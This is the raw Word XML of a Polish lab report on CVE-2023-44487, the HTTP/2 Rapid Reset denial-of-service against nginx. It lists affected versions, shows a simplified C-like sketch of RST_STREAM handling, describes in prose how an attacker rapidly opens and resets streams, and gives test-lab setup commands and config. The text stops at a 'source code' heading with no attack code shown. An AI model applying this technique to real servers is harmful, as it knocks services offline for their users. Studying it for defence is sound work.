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83D2E" w14:textId="321E0E47" w:rsidR="00FF5A96" w:rsidRDefault="00083482" w:rsidP="00083482">
      <w:pPr>
        <w:pStyle w:val="Nagwek1"/>
      </w:pPr>
      <w:r>
        <w:t>CVE-</w:t>
      </w:r>
      <w:r w:rsidR="007655E4">
        <w:t>2023-44487</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FD83D60" w14:textId="536B833A" w:rsidR="00083482" w:rsidRDefault="00083482" w:rsidP="00083482">
      <w:pPr>
        <w:pStyle w:val="Nagwek2"/>
      </w:pPr>
      <w:r>
        <w:t>Wersje podatne:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F7C115C" w14:textId="65992717" w:rsidR="00083482" w:rsidRDefault="007655E4" w:rsidP="00083482">
      <w:r>
        <w:t xml:space="preserve">Wszystkie wersje Nginx od wersji </w:t>
      </w:r>
      <w:r w:rsidRPr="007655E4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1.9.5 do 1.25.2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> są podatne na atak CVE-2023-44487. Ta luka bezpieczeństwa pozwala na przeprowadzenie ataku typu Denial of Service (DoS) przez szybkie resetowanie wielu strumieni HTTP/2. Oprócz nginx, wiele innych serwerów i aplikacji obsługujących HTTP/2 była podatnych na ten atak: </w:t>
      </w:r>
      <w:r w:rsidRPr="007655E4">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Apache, Eclipse Jetty, Envoy, Netty, nghttp2, Caddy, Goland, Jenkins</w:t>
      </w:r>
      <w:r>
        <w:t>. Wersji podatnych powyższych serwerów nie wymieniono, ponieważ atak został przetestowany tylko na serwerze Nginx.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73641ABD" w14:textId="1C6D39BF" w:rsidR="00083482" w:rsidRDefault="00083482" w:rsidP="00083482">
      <w:pPr>
        <w:pStyle w:val="Nagwek2"/>
      </w:pPr>
      <w:r>
        <w:t>Opis wykonania podatności:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18A08A89" w14:textId="1E16920D" w:rsidR="00083482" w:rsidRDefault="007655E4" w:rsidP="00083482">
      <w:r>
        <w:t>CVE-2023-44487 to luka w implementacji protokołu HTTP/2, która umożliwia atak typu Denial of Service (DoS) przez szybkie resetowanie wielu strumieni HTTP/2. Podatność ta wynika z niewłaściwego przetwarzania ramek RESET_STREAM przez serwer HTTP/2, co prowadzi do przeciążenia serwera, umożliwiając atakującemu wysyłanie i natychmiastowe resetowanie dużej liczby strumieni, skutecznie uniemożliwiając serwerowi przetwarzanie nowych żądań.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="238D92C8" w14:textId="128DFCCE" w:rsidR="00F8654F" w:rsidRDefault="00A23CFC" w:rsidP="00F8654F">
      <w:pPr>
        <w:pStyle w:val="Nagwek3"/>
      </w:pPr>
      <w:r>
        <w:t>Analiza luki</w:t>
      </w:r>
      <w:r w:rsidR="00F8654F">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D7B2E10" w14:textId="4A085432" w:rsidR="00A23CFC" w:rsidRDefault="00A23CFC" w:rsidP="00A23CFC">
      <w:r>
        <w:t>Poniżej znajduje się fragment kodu ilustrujący podatność w implementacji HTTP/2 na serwerze Nginx. Ten kod przetwarza ramki RESET_STREAM, co jest kluczowym punktem ataku CVE-2023-44487, znanego jako HTTP/2 Rapid Reset Attack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="189BB8AC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E59EDC" w:themeColor="accent5" w:themeTint="66"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">void </w:t>
      </w:r>
      <w:r w:rsidRPr="00A23CFC">
        <w:rPr>
          <w:rStyle w:val="hljs-type"/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ngx_http_v2_handle_rst_stream_frame</w:t>
      </w:r>
      <w:r w:rsidRPr="00A23CFC">
        <w:rPr>
          <w:rStyle w:val="hljs-type"/>
          <w:color w:val="E59EDC" w:themeColor="accent5" w:themeTint="66"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(ngx_http_v2_connection_t</w:t>
      </w:r>
      <w:r w:rsidRPr="00A23CFC">
        <w:rPr>
          <w:rStyle w:val="hljs-type"/>
          <w:color w:val="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> *h2c, </w:t>
      </w:r>
      <w:r w:rsidRPr="00A23CFC">
        <w:rPr>
          <w:rStyle w:val="hljs-type"/>
          <w:color w:val="E59EDC" w:themeColor="accent5" w:themeTint="66"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">ngx_http_v2_frame_t </w:t>
      </w:r>
      <w:r w:rsidRPr="00A23CFC">
        <w:rPr>
          <w:rStyle w:val="hljs-type"/>
          <w:color w:val="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>*frame) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29086751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  <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="0045096F">
        <w:rPr>
          <w:rStyle w:val="hljs-type"/>
          <w:color w:val="E59EDC" w:themeColor="accent5" w:themeTint="66"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">ngx_http_v2_stream_t </w:t>
      </w:r>
      <w:r w:rsidRPr="00A23CFC">
        <w:rPr>
          <w:rStyle w:val="hljs-type"/>
          <w:color w:val="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>*stream;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4270572E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</w:p>
    <w:p w14:paraId="6ACD67DC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  <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    stream = ngx_http_v2_get_stream_by_id(h2c, frame-&gt;stream_id);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65164F31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</w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A23CFC">
        <w:rPr>
          <w:rStyle w:val="hljs-type"/>
          <w:color w:val="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00A23CFC">
        <w:rPr>
          <w:rStyle w:val="hljs-type"/>
          <w:color w:val="156082" w:themeColor="accent1"/>
        </w:rPr>
        <w:t xml:space="preserve">if </w:t>
      </w:r>
      <w:r w:rsidRPr="00A23CFC">
        <w:rPr>
          <w:rStyle w:val="hljs-type"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">(stream == </w:t>
      </w:r>
      <w:r w:rsidRPr="00A23CFC">
        <w:rPr>
          <w:rStyle w:val="hljs-type"/>
          <w:color w:val="156082" w:themeColor="accent1"/>
        </w:rPr>
        <w:t>NULL</w:t>
      </w:r>
      <w:r w:rsidRPr="00A23CFC">
        <w:rPr>
          <w:rStyle w:val="hljs-type"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23E8F6C6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</w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A23CFC">
        <w:rPr>
          <w:rStyle w:val="hljs-type"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="00A23CFC">
        <w:rPr>
          <w:rStyle w:val="hljs-type"/>
          <w:color w:val="156082" w:themeColor="accent1"/>
        </w:rPr>
        <w:t>return</w:t>
      </w:r>
      <w:r w:rsidRPr="00A23CFC">
        <w:rPr>
          <w:rStyle w:val="hljs-type"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B4FD9F4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</w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A23CFC">
        <w:rPr>
          <w:rStyle w:val="hljs-type"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01693F2F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</w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3DA9A3E0" w14:textId="77777777" w:rsidR="00A23CFC" w:rsidRPr="0045096F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BFBFBF" w:themeColor="background1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A23CFC">
        <w:rPr>
          <w:rStyle w:val="hljs-type"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="0045096F">
        <w:rPr>
          <w:rStyle w:val="hljs-type"/>
          <w:color w:val="BFBFBF" w:themeColor="background1" w:themeShade="BF"/>
        </w:rPr>
        <w:t>// Przetwarzanie resetu strumienia</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30008BE3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</w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00A23CFC">
        <w:rPr>
          <w:rStyle w:val="hljs-type"/>
          <w:color w:val="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ngx_http_v2_close_stream(stream, NGX_HTTP_V2_RST_STREAM);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20035BA8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  <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00A23CFC">
        <w:rPr>
          <w:rStyle w:val="hljs-type"/>
          <w:color w:val="E97132" w:themeColor="accent2"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>log</w:t>
      </w:r>
      <w:r w:rsidRPr="00A23CFC">
        <w:rPr>
          <w:rStyle w:val="hljs-type"/>
          <w:color w:val="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="0045096F">
        <w:rPr>
          <w:rStyle w:val="hljs-type"/>
          <w:color w:val="8DD873" w:themeColor="accent6" w:themeTint="99"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">"Stream reset processed for stream id: %d", </w:t>
      </w:r>
      <w:r w:rsidRPr="00A23CFC">
        <w:rPr>
          <w:rStyle w:val="hljs-type"/>
          <w:color w:val="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>frame-&gt;stream_id);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BE00DDB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  <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D804B86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</w:p>
    <w:p w14:paraId="5DDE19A9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E59EDC" w:themeColor="accent5" w:themeTint="66"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">void </w:t>
      </w:r>
      <w:r w:rsidRPr="0045096F">
        <w:rPr>
          <w:rStyle w:val="hljs-type"/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ngx_http_v2_close_stream</w:t>
      </w:r>
      <w:r w:rsidRPr="00A23CFC">
        <w:rPr>
          <w:rStyle w:val="hljs-type"/>
          <w:color w:val="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00A23CFC">
        <w:rPr>
          <w:rStyle w:val="hljs-type"/>
          <w:color w:val="E59EDC" w:themeColor="accent5" w:themeTint="66"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">ngx_http_v2_stream_t </w:t>
      </w:r>
      <w:r w:rsidRPr="00A23CFC">
        <w:rPr>
          <w:rStyle w:val="hljs-type"/>
          <w:color w:val="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">*stream, </w:t>
      </w:r>
      <w:r w:rsidRPr="00A23CFC">
        <w:rPr>
          <w:rStyle w:val="hljs-type"/>
          <w:color w:val="E59EDC" w:themeColor="accent5" w:themeTint="66"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">int </w:t>
      </w:r>
      <w:r w:rsidRPr="00A23CFC">
        <w:rPr>
          <w:rStyle w:val="hljs-type"/>
          <w:color w:val="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>status) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C8B5B43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</w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A23CFC">
        <w:rPr>
          <w:rStyle w:val="hljs-type"/>
          <w:color w:val="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="0045096F">
        <w:rPr>
          <w:rStyle w:val="hljs-type"/>
          <w:color w:val="BFBFBF" w:themeColor="background1" w:themeShade="BF"/>
        </w:rPr>
        <w:t>// Zwolnienie zasobów przypisanych do strumienia</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7938DE45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</w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A23CFC">
        <w:rPr>
          <w:rStyle w:val="hljs-type"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">    free_resources(stream);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15B40178" w14:textId="77777777" w:rsidR="00A23CFC" w:rsidRP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</w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00A23CFC">
        <w:rPr>
          <w:rStyle w:val="hljs-type"/>
          <w:color w:val="E97132" w:themeColor="accent2"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>log</w:t>
      </w:r>
      <w:r w:rsidRPr="00A23CFC">
        <w:rPr>
          <w:rStyle w:val="hljs-type"/>
          <w:color w:val="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="0045096F">
        <w:rPr>
          <w:rStyle w:val="hljs-type"/>
          <w:color w:val="8DD873" w:themeColor="accent6" w:themeTint="99"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">"Stream closed with status: %d", </w:t>
      </w:r>
      <w:r w:rsidRPr="00A23CFC">
        <w:rPr>
          <w:rStyle w:val="hljs-type"/>
          <w:color w:val="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>status);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03660B33" w14:textId="77777777" w:rsidR="00A23CFC" w:rsidRDefault="00A23CFC" w:rsidP="00A23CFC">
      <w:pPr>
        <w:pStyle w:val="Cytat"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        <w:rPr>
          <w:rStyle w:val="hljs-type"/>
          <w:color w:val="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A23CFC">
        <w:rPr>
          <w:rStyle w:val="hljs-type"/>
          <w:color w:val="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="776C5FCE" w14:textId="77777777" w:rsidR="0045096F" w:rsidRDefault="0045096F" w:rsidP="00A23CFC">
      <w:pPr>
        <w:pStyle w:val="Nagwek3"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26B335FA" w14:textId="419B21CC" w:rsidR="00812475" w:rsidRDefault="00812475" w:rsidP="00A23CFC">
      <w:pPr>
        <w:pStyle w:val="Nagwek3"/>
      </w:pPr>
      <w:r>
        <w:t>Wykorzystanie luki:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E7D2257" w14:textId="5BA8DA98" w:rsidR="0045096F" w:rsidRDefault="0045096F" w:rsidP="0045096F">
      <w:r>
        <w:t xml:space="preserve">Atakujący nawiązuje połączenie z serwerem Nginx i inicjuje sesję HTTP/2. Następnie inicjuje wiele równoczesnych strumieni w ramach jednego połączenia </w:t>
      </w:r>
      <w:r w:rsidRPr="0045096F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>HTTP/2</w:t>
      </w:r>
      <w:r>
        <w:t>, każdy strumien jest identyfikowany przez unikalne ‘</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>stream_id</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">’. Kolejnym krokiem jest wysłanie ramki </w:t>
      </w:r>
      <w:r w:rsidRPr="0045096F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>RESET_STREAM</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> dla każdego utworzonego strumienia. Ta ramka zawiera ‘</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>stream_id</w:t>
      </w:r>
      <w:r>
        <w:t>’ strumienia, który ma zostać zresetowany.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BA775C1" w14:textId="4B87D2B2" w:rsidR="0045096F" w:rsidRPr="0045096F" w:rsidRDefault="0045096F" w:rsidP="0045096F">
      <w:r>
        <w:t>Serwer Nginx otrzymuje ramki RESET_STREAM i przetwarza je w funkcji ‘</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ngx_http_v2_handle_rst_stream_frame</w:t>
      </w:r>
      <w:r>
        <w:t>’, lokalizuje strumień na podstawie ‘</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>stream_id</w:t>
      </w:r>
      <w:r>
        <w:t>’ i zamyka go, zwalniając zasoby przypisane do tego strumienia w funkcji ‘</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ngx_http_v2_close_stream</w:t>
      </w:r>
      <w:r>
        <w:t>’. Atakujący szybko inicjuje i resetuje wiele strumieni, przez co serwer Nginx jest zmuszony do ciągłego przetwarzania tych ramek, co prowadzi do intensywnego zużycia zasobów procesora i pamięci.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5325BE6E" w14:textId="1982F12A" w:rsidR="00812475" w:rsidRDefault="00812475" w:rsidP="00812475">
      <w:pPr>
        <w:pStyle w:val="Nagwek3"/>
      </w:pPr>
      <w:r>
        <w:t>Konsekwencje:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69B03C7D" w14:textId="40E56C39" w:rsidR="00BC683D" w:rsidRDefault="0045096F" w:rsidP="00BC683D">
      <w:r>
        <w:t>W wyniku ataku serwer Nginx może przestać odpowiadać, co prowadzi do odmowy usługi dla prawidłowych żądań.</w:t>
      </w:r>
      <w:r w:rsidR="002944F7">
        <w:t xml:space="preserve"> Atakujący skutecznie przeciąża serwer Nginx, prowadząc do jego niestabilności i odmowy usługi(DoS).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A641456" w14:textId="27747E1B" w:rsidR="00BC683D" w:rsidRDefault="000C3DA8" w:rsidP="00BC683D">
      <w:pPr>
        <w:pStyle w:val="Nagwek2"/>
      </w:pPr>
      <w:r>
        <w:t>Konfiguracja środowiska testowego</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27EFE9B1" w14:textId="3DA17268" w:rsidR="00BC683D" w:rsidRDefault="000C3DA8" w:rsidP="00BC683D">
      <w:pPr>
        <w:pStyle w:val="Nagwek3"/>
      </w:pPr>
      <w:r>
        <w:t>Instalacja Nginx:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ABBEB10" w14:textId="277E1A2D" w:rsidR="00BC683D" w:rsidRDefault="000C3DA8" w:rsidP="000C3DA8">
      <w:r>
        <w:tab/>
        <w:t>Najpierw należy zainstalować serwer Nginx. Na systemach opartych na Debianie, takich jak Ubuntu, można to zrobić za pomocą poniższych poleceń:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21A70F53" w14:textId="77777777" w:rsidR="000C3DA8" w:rsidRPr="000C3DA8" w:rsidRDefault="000C3DA8" w:rsidP="000C3DA8">
      <w:pPr>
        <w:pStyle w:val="Cytat"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000C3DA8">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sudo apt update</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="586462B9" w14:textId="2103A6F7" w:rsidR="000C3DA8" w:rsidRPr="000C3DA8" w:rsidRDefault="000C3DA8" w:rsidP="000C3DA8">
      <w:pPr>
        <w:pStyle w:val="Cytat"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000C3DA8">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sudo apt install nginx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="341448A2" w14:textId="77777777" w:rsidR="000C3DA8" w:rsidRPr="000C3DA8" w:rsidRDefault="000C3DA8" w:rsidP="00BC683D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3234C43D" w14:textId="62E992C3" w:rsidR="00BC683D" w:rsidRDefault="000C3DA8" w:rsidP="00BC683D">
      <w:pPr>
        <w:pStyle w:val="Nagwek3"/>
      </w:pPr>
      <w:r>
        <w:t>Generowanie certyfikatów SSL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A356C2A" w14:textId="512A90F2" w:rsidR="00BC683D" w:rsidRDefault="000C3DA8" w:rsidP="00BC683D">
      <w:r>
        <w:tab/>
        <w:t>HTTP/2 w Nginx wymaga połączenia HTTPS, więc konieczne jest wygenerowanie certyfikatów SSL. Można to zrobić za pomocą OpenSSL:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29E7FBD0" w14:textId="77777777" w:rsidR="000C3DA8" w:rsidRDefault="000C3DA8" w:rsidP="000C3DA8">
      <w:pPr>
        <w:pStyle w:val="Cytat"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000C3DA8">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo openssl req -x509 -nodes -days 365 -newkey rsa:2048 -keyout /etc/ssl/private/nginx-selfsigned.key -out /etc/ssl/certs/nginx-selfsigned.crt </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DA06B66" w14:textId="4B2A1EAF" w:rsidR="000C3DA8" w:rsidRPr="000C3DA8" w:rsidRDefault="000C3DA8" w:rsidP="000C3DA8">
      <w:pPr>
        <w:pStyle w:val="Cytat"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000C3DA8">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sudo openssl dhparam -out /etc/ssl/certs/dhparam.pem 2048</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B414B59" w14:textId="77777777" w:rsidR="000C3DA8" w:rsidRPr="000C3DA8" w:rsidRDefault="000C3DA8" w:rsidP="00BC683D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="74D9055E" w14:textId="77777777" w:rsidR="00066C22" w:rsidRDefault="00066C22" w:rsidP="00BC683D">
      <w:pPr>
        <w:pStyle w:val="Nagwek3"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="288C7DB7" w14:textId="77777777" w:rsidR="00066C22" w:rsidRDefault="00066C22" w:rsidP="00BC683D">
      <w:pPr>
        <w:pStyle w:val="Nagwek3"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="43991B44" w14:textId="77777777" w:rsidR="00066C22" w:rsidRDefault="00066C22" w:rsidP="00066C22"/>
    <w:p w14:paraId="1CF6B421" w14:textId="77777777" w:rsidR="00066C22" w:rsidRPr="00066C22" w:rsidRDefault="00066C22" w:rsidP="00066C22"/>
    <w:p w14:paraId="083979E5" w14:textId="23239EB6" w:rsidR="00BC683D" w:rsidRDefault="000C3DA8" w:rsidP="00BC683D">
      <w:pPr>
        <w:pStyle w:val="Nagwek3"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Konfiguracja Nginx do obsługi HTTP/2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2117B1B3" w14:textId="3F70F669" w:rsidR="00BC683D" w:rsidRDefault="000C3DA8" w:rsidP="00BC683D">
      <w:r>
        <w:tab/>
        <w:t>Należy zmienić konfigurację Nginx, aby włączyć obsługę HTTP/2. W pliku konfiguracyjnym serwera Nginx ‘</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>nginx.conf</w:t>
      </w:r>
      <w:r>
        <w:t>’ zmodyfikowano sekcję serwera następująco:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B986941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>server {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="410A9856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listen 443 ssl http2;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E82FE26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server_name localhost;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="125CC8A8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ssl_certificate /etc/ssl/certs/nginx-selfsigned.crt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C8A8823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ssl_certificate_key /etc/ssl/private/nginx-selfsigned.key;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3995558C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ssl_protocols TLSv1 TLSv1.1 TLSv1.2;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30FFA37E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#charset koi8-r;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A2FE520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</w:p>
    <w:p w14:paraId="7A75D9FB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#access_log logs/host.access.log main;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16387ED4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</w:p>
    <w:p w14:paraId="10663C3F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location / {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D21FD53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    root html;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C003B15" w14:textId="77777777" w:rsidR="00066C22" w:rsidRPr="00066C22" w:rsidRDefault="00066C22" w:rsidP="00066C22">
      <w:pPr>
        <w:pStyle w:val="Cytat"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00066C22">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">        index index.html index.htm;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FE77DFB" w14:textId="77777777" w:rsidR="00066C22" w:rsidRDefault="00066C22" w:rsidP="00066C22">
      <w:pPr>
        <w:pStyle w:val="Cytat"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
      </w:pPr>
      <w:r w:rsidRPr="00066C22">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7124862D" w14:textId="3ED8C87F" w:rsidR="000C3DA8" w:rsidRDefault="00066C22" w:rsidP="00066C22">
      <w:pPr>
        <w:pStyle w:val="Cytat"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44B3FDBF" w14:textId="77777777" w:rsidR="00066C22" w:rsidRDefault="00066C22" w:rsidP="00066C22">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3FC19C2E" w14:textId="68BCF47D" w:rsidR="00066C22" w:rsidRDefault="00066C22" w:rsidP="006043A3">
      <w:r>
        <w:t>Po zmianie konfiguracji należy zrestartować serwer Nginx, aby zmiany zostały zapisane.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="365368A8" w14:textId="3F69251D" w:rsidR="007D738D" w:rsidRDefault="007D738D" w:rsidP="007D738D">
      <w:pPr>
        <w:pStyle w:val="Nagwek1"/>
      </w:pPr>
      <w:r>
        <w:t>Kod źródłowy</w:t>
      </w:r>
    </w:p>
